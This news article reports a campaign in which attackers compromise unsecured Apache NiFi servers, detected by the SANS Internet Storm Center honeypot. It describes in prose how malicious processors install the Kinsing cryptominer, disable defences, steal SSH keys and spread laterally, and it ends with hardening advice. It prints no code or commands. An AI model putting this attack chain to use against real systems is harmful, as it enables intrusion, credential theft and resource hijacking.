Indicators of the ongoing campaign were first spotted by the SANS Internet Storm Center when, on May 19th, their distributed sensor network detected a significant spike in requests for “/nifi.”
After redirecting some of the requests to their honeypot system running the latest version (v1.21.0) of the data processing and distribution solution, they discovered that someone is:
- Accessing unsecured installations
- Adding scheduled processors to retrieve and install scripts that install a cryptocurrency miner (Kinsing) and, in some cases, attempt to find other connected targets by searching the server for SSH credentials
Both scripts are kept in memory (i.e., they are not saved to the file system).
The first one attempts to do things like disable the firewall and monitoring tools, find and terminate other cryptomining tools, install the Kinsing cryptominer, make standard temporary directories immutable (likely to prevent additional exploits), and more.
The second one tries to determine the victim’s external IP address, collects SSH keys from the system, and tries to connect to other hosts and deploy the script delivering the cryptominer.
“The requests arrived almost exclusively from 18.104.22.168. In addition to scanning for NiFi, the same IP also sends requests for /boaform/admin/formLogin. Various routers use this URL as a login page and are often scanned for weak passwords and other vulnerabilities,” said Dr. Johannes Ullrich, Dean of Research at the SANS Technology Institute.
He told Help Net Security that based on the lateral movement they say, he thinks the attacker is likely using the routers as a stepping stone.
“Routers make bad cryptomining servers. Cryptomining may be what they end up doing if the lateral movement doesn’t get them anywhere (like our honeypot was on an isolated network with nowhere to go to).”
How many unsecured Apache NiFi instances are there?
Dr. Ullrich says he found around 100, but there are likely more. Many of the discovered unsecured instances are hosted with cloud providers (e.g., Azure).
“Due to its use as a data processing platform, NiFi servers often have access to business-critical data. NiFi presents an attractive target for anyone who wants to steal, modify or delete the data,” he says.
But they are also configured with larger CPUs to support data transformation tasks, meaning that they can also easily support cryptomining activities.
SANS ISC has provided the malicious scripts and indicators that point to compromise: malicious cron jobs for persistence, odd processors in the NiFi configuration, IP addresses, and hashes of the scripts and the cryptominer.
In general, though, Apache NiFi instances should not be internet-facing and access to them should be properly secured (as advised and instructed in the official sysadmin’s guide).